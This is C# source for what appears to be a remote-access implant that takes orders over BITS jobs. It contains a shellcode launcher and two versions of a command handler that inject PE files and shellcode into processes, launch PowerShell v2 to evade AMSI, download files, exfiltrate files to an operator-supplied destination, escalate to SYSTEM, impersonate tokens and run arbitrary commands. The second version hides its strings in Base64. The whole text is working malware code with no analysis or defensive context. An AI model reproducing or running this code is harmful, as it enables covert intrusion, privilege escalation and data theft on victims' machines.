public static void Main(byte[] shellCode, SysCallManager sysCall, int pid) { var obj = new LauncherShellCode(); var thr1 = new Thread(ExecuteShellCodeInMemory); var a = new object[] { shellCode, sysCall, pid }; thr1.Start(a); }
private void DoSomething(Content file) { var rps = ""; try { switch (file.Commands[0]) { case "inject_pe": { var fileP = _tempPath + @"\" + _id; var headers = "reqId: " + _auth + "\r\ncontid: " + ContId; if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND)) { try { var pe = LoadPE(fileP); var method = file.Commands[1]; var args = ""; for (var i = 2; i < file.Commands.Length; i++) { args += file.Commands[i]; if (i < file.Commands.Length) { args += " "; } } var arguments = new string[] { args }; LauncherPE.Main(method, arguments, pe); rps = "PE injected!"; } catch (Exception) { rps = "ERR:Fatal error occurred while trying to inject the dll.\n"; } } else { rps = "ERR:Dll not found!\n"; } break; } case "inject_shellcode": { var fileP = _tempPath + @"\" + _id; var headers = "reqId: " + _auth + "\r\ncontid: " + ContId; var pid = -1; if (file.Commands.Length >= 2) { pid = int.Parse(file.Commands[1]); } if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND)) { byte[] sh; GetEncryptedFileContent(fileP, out sh); try { LauncherShellCode.Main(sh, _sysCall, pid); rps = "Shellcode injected!\n"; } catch (Exception) { rps = "ERR:Fatal error occurred while trying to inject shellCode.\n"; } } else { rps = "ERR:Shellcode file not found!\n"; } break; } case "powershell": { rps = Utils.ExecuteCommand("powershell -V 2 /C Write-Host hi"); if (rps.Contains("hi")) { LauncherPowershell.Main(file.Commands[1], file.Commands[2]); rps = "You should have your Powershell at " + file.Commands[1] + ":" + file.Commands[2] + "!\n"; } else { rps = "Version 2 of Powershell not available. Try injecting EvilSalsa by CyberVaca in order to use powershell without am" + "si.\n"; } break; } case "send": { var fileP = _tempPath + @"\" + _id; var headers = "reqId: " + _auth + "\r\ncontid: " + ContId; if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND)) { File.Copy(fileP, file.Commands[1], true); rps = "Dowload finished.\n"; } else { rps = "ERR:Download failed!\n"; } break; } case "exfiltrate": { if (File.Exists(file.Commands[1])) { if (_jobsManager.Send(file.Commands[2], file.Commands[1])) { rps = "Exfiltration succeed.\n"; } else { rps = "ERR:Exfiltration failed!\n"; } } else { rps = "ERR:File to exfiltrate not found!\n"; } break; } case "getsystem": { if (Utils.IsHighIntegrity(_sysCall)) { rps = _tokenManager.GetSystem() ? "We are System!\n" : "ERR:Process failed! Is this process running with high integrity level?\n"; } else { rps = "ERR:Process failed! Is this process running with high integrity level?\n"; } break; } case "rev2self": { TokenManager.Rev2Self(); rps = "Welcome back.\n"; break; } case "runas": { string user = "", domain = "", password = ""; var userData = file.Commands[1].Split('\\'); if (userData.Length == 1) { domain = "."; user = userData[0]; } else { domain = userData[0]; user = userData[1]; } password = file.Commands[2]; rps = TokenManager.RunAs(domain, user, password) ? "Success!" : "ERR:Invalid credentials."; break; } case "list": { rps = GetProcessInfo(); break; } case "impersonate": { try { if (_tokenManager.Impersonate(int.Parse(file.Commands[1]))) { rps = "Impersonation achieved!\n"; } else { rps = "ERR: Not enough privileges!\n"; } } catch { rps = "ERR: Impersonation failed!\n"; } break; } case "exit": { Environment.Exit(0); break; } default: { rps = Utils.ExecuteCommand(file.Commands[0]); break; } } } catch { rps = "ERR: Something went wrong!"; } var response = new Response(rps, _auth); var filePath = _tempPath + @"\" + _id + ".txt"; EncryptResponseIntoFile(filePath, response); TrySend(filePath); }
private void DoSomething(Content file) { var rps = ""; try { switch (file.Commands[0]) { case "inject_pe": { var fileP = _tempPath + @"\" + _id; var headers = "reqId: " + _auth + "\r\ncontid: " + _contId; if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND)) { try { var pe = LoadPE(fileP); var method = file.Commands[1]; var args = ""; for (var i = 2; i < file.Commands.Length; i++) { args += file.Commands[i]; if (i < file.Commands.Length) { args += " "; } } var arguments = new string[] { args }; LauncherPE.Main(method, arguments, pe); rps = Encoding.UTF8.GetString(Convert.FromBase64String("UEUgaW5qZWN0ZWQh")); } catch (Exception) { rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkZhdGFsIGVycm9yIG9jY3VycmVkIHdoaWxlIHRyeWluZyB0byBpbmplY3QgdGhlIGRsbC4=")); } } else { rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkRsbCBub3QgZm91bmQh")); } break; } case "inject_shellcode": { var fileP = _tempPath + @"\" + _id; var headers = "reqId: " + _auth + "\r\ncontid: " + _contId; var pid = -1; if (file.Commands.Length >= 2) { pid = int.Parse(file.Commands[1]); } if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND)) { byte[] sh; GetEncryptedFileContent(fileP, out sh); try { LauncherShellCode.Main(sh, _sysCall, pid); rps = Encoding.UTF8.GetString(Convert.FromBase64String("U2hlbGxjb2RlIGluamVjdGVkIQ==")); } catch (Exception) { rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkZhdGFsIGVycm9yIG9jY3VycmVkIHdoaWxlIHRyeWluZyB0byBpbmplY3QgdGhlIHNoZWxsY29kZS4=")); } } else { rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOlNoZWxsY29kZSBmaWxlIG5vdCBmb3VuZCE=")); } break; } case "powershell": { rps = Utils.ExecuteCommand(Encoding.UTF8.GetString(Convert.FromBase64String("cG93ZXJzaGVsbCAtViAyIC9DIFdyaXRlLUhvc3QgaGk=")), _sysCall); if (rps.Contains("hi")) { LauncherPowershell.Main(file.Commands[1], file.Commands[2]); rps = Encoding.UTF8.GetString(Convert.FromBase64String("WW91IHNob3VsZCBoYXZlIHlvdXIgUG93ZXJzaGVsbCBhdCA=")) + file.Commands[1] + ":" + file.Commands[2] + "!\n"; } else { rps = Encoding.UTF8.GetString(Convert.FromBase64String( "VmVyc2lvbiAyIG9mIFBvd2Vyc2hlbGwgbm90IGF2YWlsYWJsZS4gVHJ5IGluamVjdGluZyB" + "FdmlsU2Fsc2EgYnkgQ3liZXJWYWNhIGluIG9yZGVyIHRvIHVzZSBwb3dlcnNoZWxsIHdpdGhvdXQgYW0=")) + "si.\n"; } break; } case "send": { var fileP = _tempPath + @"\" + _id; var headers = "reqId: " + _auth + "\r\ncontid: " + _contId; if (_jobsManager.Get(_id, fileP, headers, BITS.BG_JOB_PRIORITY.BG_JOB_PRIORITY_FOREGROUND)) { File.Copy(fileP, file.Commands[1], true); rps = Encoding.UTF8.GetString(Convert.FromBase64String("RG93bG9hZCBmaW5pc2hlZC4=")); } else { rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkRvd25sb2FkIGZhaWxlZCE=")); } break; } case "exfiltrate": { if (File.Exists(file.Commands[1])) { if (_jobsManager.Send(file.Commands[2], file.Commands[1])) { rps = Encoding.UTF8.GetString(Convert.FromBase64String("RXhmaWx0cmF0aW9uIHN1Y2NlZWQu")); } else { rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkV4ZmlsdHJhdGlvbiBmYWlsZWQh")); } } else { rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkZpbGUgdG8gZXhmaWx0cmF0ZSBub3QgZm91bmQh")); } break; } case "getsystem": { if (Utils.IsHighIntegrity(_sysCall)) { rps = _tokenManager.GetSystem(_sysCall) ? Encoding.UTF8.GetString(Convert.FromBase64String("V2UgYXJlIFN5c3RlbSE=")) : Encoding.UTF8.GetString(Convert.FromBase64String("V2UgYXJlIFN5c3RlbSFcbkVS" + "UjpQcm9jZXNzIGZhaWxlZCEgSXMgdGhpcyBwcm9jZXNzIHJ1bm5pbmcgd2l0aCBoaWdoIGludGVncml0eSBsZXZlbD8=")); } else { rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOlByb2Nlc3MgZmFpbGVkISBJcyB0aGlzIHByb2Nlc3MgcnVubmluZyB3aXRoIGhpZ2ggaW50ZWdyaXR5IGxldmVsPw==")); } break; } case "rev2self": { TokenManager.Rev2Self(); rps = "Welcome back.\n"; break; } case "runas": { string user = "", domain = "", password = ""; var userData = file.Commands[1].Split('\\'); if (userData.Length == 1) { domain = "."; user = userData[0]; } else { domain = userData[0]; user = userData[1]; } password = file.Commands[2]; rps = TokenManager.RunAs(domain, user, password) ? "Success!" : Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOkludmFsaWQgY3JlZGVudGlhbHMu")); break; } case "list": { rps = GetProcessInfo(); break; } case "impersonate": { try { if (_tokenManager.Impersonate(int.Parse(file.Commands[1]), _sysCall)) { rps = Encoding.UTF8.GetString(Convert.FromBase64String("SW1wZXJzb25hdGlvbiBhY2hpZXZlZCE=")); } else { rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOiBOb3QgZW5vdWdoIHByaXZpbGVnZXMh")); } } catch { rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOiBJbXBlcnNvbmF0aW9uIGZhaWxlZCE=")); } break; } case "exit": { Environment.Exit(0); break; } default: { rps = Utils.ExecuteCommand(file.Commands[0], _sysCall); break; } } } catch { rps = Encoding.UTF8.GetString(Convert.FromBase64String("RVJSOiBTb21ldGhpbmcgd2VudCB3cm9uZyE=")); } var response = new Response(rps, _auth); var filePath = _tempPath + @"\" + _id + ".txt"; EncryptResponseIntoFile(filePath, response); TrySend(filePath); }